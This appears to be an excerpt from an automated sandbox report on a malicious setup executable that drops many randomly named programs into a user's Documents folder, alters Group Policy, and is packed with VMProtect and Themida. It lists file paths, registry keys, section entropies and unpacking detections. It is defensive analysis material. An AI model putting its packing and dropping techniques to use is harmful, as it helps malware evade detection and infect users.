Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA502722-A23D-11D1-A7D3-0000F87571E3}\InProcServer32

Jump to behavior

Source: PowerExpertNT.lnk.7.dr

LNK file: ..\..\..\..\..\..\Local\Temp\PowerExpertNT\PowerExpertNT.exe

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 1719859269.0326595_setup.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 1719859269.0326595_setup.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 1719859269.0326595_setup.exe

Static file information: File size 4569908 > 1048576

Source: 1719859269.0326595_setup.exe

Static PE information: Raw size of .vmp<E is bigger than: 0x100000 < 0x434a00

Source:	Binary string: mozglue.pdbP source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: nss3.pdb@ source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: C:\Users\teres\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772EXE\obj\Debug\playApp_multy.pdb source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000000.2312651651.0000000000802000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: PE.pdbH] source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2421761793.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2468716919.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2421723577.0000000003231000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\CcYLxMOT.pdb source: yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2485120366.0000000005D70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: PE.pdb source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2421761793.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2468716919.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2421723577.0000000003231000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: newsoftgnu.pdb source: 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: mozglue.pdb source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: C:\Users\teres\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\fxYgZM.pdb source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2478274768.00000000054E0000.00000004.08000000.00040000.00000000.sdmp, 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2446122918.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Unpacked PE file: 9.2.Lbg6Jgx2PuK0JimgGIFCI5UU.exe.a00000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe	Unpacked PE file: 31.2.mp3doctorfree32_64.exe.400000.0.unpack .text:ER;.hhead9:R;.data:W;.rsrc:R;.ihead9:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe

Unpacked PE file: 31.2.mp3doctorfree32_64.exe.400000.0.unpack

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Code function: 9_2_665E0E40 LoadLibraryW,GetProcAddress,__Init_thread_footer,FreeLibrary,

9_2_665E0E40

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp<E

Source: AAAAKJKJEB.exe.9.dr	Static PE information: real checksum: 0x1ce160 should be: 0x1d4eea
Source: alXewrRe7Pi_SQbFkI0y1vcR.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x74dad1
Source: H1pBxuA3W1wJGbhYT2DZXaLH.tmp.8.dr	Static PE information: real checksum: 0x0 should be: 0xadbc5
Source: setup[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x754342
Source: kUJOpvLlbhqCDkTlllfRFIPb.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x754342
Source: amadka[1].exe.9.dr	Static PE information: real checksum: 0x1ce160 should be: 0x1d4eea
Source: crt[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x530251
Source: 4Q6k8SlqG7M24bYO3UgMWICf.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xea35e
Source: setup[2].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x74dad1
Source: 1719859269.0326595_setup.exe	Static PE information: real checksum: 0x45ffc5 should be: 0x466ef9
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x267668
Source: super[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x267668
Source: H1pBxuA3W1wJGbhYT2DZXaLH.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x530251

Source: 1719859269.0326595_setup.exe	Static PE information: section name: _RDATA
Source: 1719859269.0326595_setup.exe	Static PE information: section name: .vmp<E
Source: 1719859269.0326595_setup.exe	Static PE information: section name: .vmp<E
Source: 1719859269.0326595_setup.exe	Static PE information: section name: .vmp<E
Source: 123p[1].exe.0.dr	Static PE information: section name: .00cfg
Source: 123p[1].exe.0.dr	Static PE information: section name: .text0
Source: 123p[1].exe.0.dr	Static PE information: section name: .text1
Source: 123p[1].exe.0.dr	Static PE information: section name: .text2
Source: ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe.0.dr	Static PE information: section name: .00cfg
Source: ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe.0.dr	Static PE information: section name: .text0
Source: ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe.0.dr	Static PE information: section name: .text1
Source: ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe.0.dr	Static PE information: section name: .text2
Source: setup[1].exe.0.dr	Static PE information: section name: .sxdata
Source: streamer[1].exe.0.dr	Static PE information: section name: .xdata
Source: kUJOpvLlbhqCDkTlllfRFIPb.exe.0.dr	Static PE information: section name: .sxdata
Source: super[1].exe.0.dr	Static PE information: section name:
Source: super[1].exe.0.dr	Static PE information: section name:
Source: super[1].exe.0.dr	Static PE information: section name:
Source: super[1].exe.0.dr	Static PE information: section name:
Source: super[1].exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name: .themida
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name: .boot
Source: yTXn1eeuAPe6JeFa5Kfn6hMY.exe.0.dr	Static PE information: section name: .xdata
Source: setup[2].exe.0.dr	Static PE information: section name: .sxdata
Source: alXewrRe7Pi_SQbFkI0y1vcR.exe.0.dr	Static PE information: section name: .sxdata
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name: .themida
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name: .boot
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name: .themida
Source: PowerExpertNT.exe.7.dr	Static PE information: section name: .boot
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name: .themida
Source: WinTrackerSP.exe.7.dr	Static PE information: section name: .boot
Source: freebl3.dll.9.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.9.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.9.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.9.dr	Static PE information: section name: .didat
Source: nss3.dll.9.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.9.dr	Static PE information: section name: .00cfg
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name:
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name: .idata
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name:
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name: jkbeubqv
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name: ybbtgqtz
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name: .taggant
Source: amadka[1].exe.9.dr	Static PE information: section name:
Source: amadka[1].exe.9.dr	Static PE information: section name: .idata
Source: amadka[1].exe.9.dr	Static PE information: section name:
Source: amadka[1].exe.9.dr	Static PE information: section name: jkbeubqv
Source: amadka[1].exe.9.dr	Static PE information: section name: ybbtgqtz
Source: amadka[1].exe.9.dr	Static PE information: section name: .taggant
Source: softokn3[1].dll.9.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00A99887 push edi; mov dword ptr [esp], esi	7_2_00C90AD7
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00A99887 push ecx; mov dword ptr [esp], 03738EA7h	7_2_00CA0FB0
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00A988E5 push 7738EED0h; mov dword ptr [esp], esp	7_2_00CB0B89
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_007B0C2B push 3E44BDD2h; mov dword ptr [esp], eax	7_2_00CB184B
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00A96EF7 push 73A8E10Ah; mov dword ptr [esp], ebp	7_2_00CBE0C4
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00A430D8 push 13012614h; mov dword ptr [esp], ebx	7_2_00C98097
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00932817 push 5BD0E9BAh; mov dword ptr [esp], edx	7_2_00CB3177
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_0091A01F push 47F9F8D3h; mov dword ptr [esp], ecx	7_2_00CBF5F8
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_006B3AD4 push ecx; ret	7_2_006B3AE7
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00936C44 push ebp; mov dword ptr [esp], ecx	7_2_00C9A4F2
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00936C44 push 180EECD3h; mov dword ptr [esp], edx	7_2_00C9A505
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00903982 push ecx; mov dword ptr [esp], 1D2BD1B1h	7_2_00C9D9BC
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00903982 push 16C68FE0h; mov dword ptr [esp], edx	7_2_00CBB578
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00989F80 push ebp; mov dword ptr [esp], edx	7_2_00CBCCA3
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00938BAA push 52A70B7Eh; mov dword ptr [esp], ecx	7_2_00CB3122
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00938BAA push 3EEDBF02h; mov dword ptr [esp], eax	7_2_00CB9EAC
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_007D5D3C push 5C267998h; mov dword ptr [esp], esi	7_2_00CA922E
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_0079872B push 529EC82Eh; mov dword ptr [esp], edi	7_2_00CA3036
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_0079872B push 473A3766h; mov dword ptr [esp], eax	7_2_00CB9F7E
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_0078291E push 63A9446Ch; mov dword ptr [esp], eax	7_2_00CA98BA
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_007D6717 push edi; mov dword ptr [esp], ebp	7_2_00CAA668
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_007D6717 push 4040AE3Dh; mov dword ptr [esp], esi	7_2_00CB8FD4
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_00796DE4 push ebp; mov dword ptr [esp], ecx	7_2_00CBB356
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_0093D979 push eax; mov dword ptr [esp], edx	7_2_00CBF72C
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: 8_2_00406518 push 00406555h; ret	8_2_0040654D
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: 8_2_00408028 push ecx; mov dword ptr [esp], eax	8_2_0040802D
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: 8_2_004040B5 push eax; ret	8_2_004040F1
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: 8_2_00404185 push 00404391h; ret	8_2_00404389
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: 8_2_00404206 push 00404391h; ret	8_2_00404389
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: 8_2_0040C218 push eax; ret	8_2_0040C219
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: 8_2_004042E8 push 00404391h; ret	8_2_00404389

Source: super[1].exe.0.dr	Static PE information: section name: entropy: 7.995086069562057
Source: super[1].exe.0.dr	Static PE information: section name: entropy: 7.979644498379543
Source: super[1].exe.0.dr	Static PE information: section name: entropy: 7.952841627314969
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name: entropy: 7.995086069562057
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name: entropy: 7.979644498379543
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name: entropy: 7.952841627314969
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name: entropy: 7.982639711958914
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name: entropy: 7.982639711958914
Source: PowerExpertNT.exe.7.dr	Static PE information: section name: entropy: 7.982639711958914
Source: WinTrackerSP.exe.7.dr	Static PE information: section name: entropy: 7.982639711958914
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name: entropy: 7.98107146433441
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name: jkbeubqv entropy: 7.952996197240488
Source: amadka[1].exe.9.dr	Static PE information: section name: entropy: 7.98107146433441
Source: amadka[1].exe.9.dr	Static PE information: section name: jkbeubqv entropy: 7.952996197240488

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-JR9V0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcr120.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-4H4R9.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-0K04O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\libmp3lame.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-P12J5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-QM7CF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-IK2RF.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lumma2806[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\Users\user\AppData\Local\Temp\AAAAKJKJEB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-18MLT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-RPUL3.tmp	Jump to dropped file
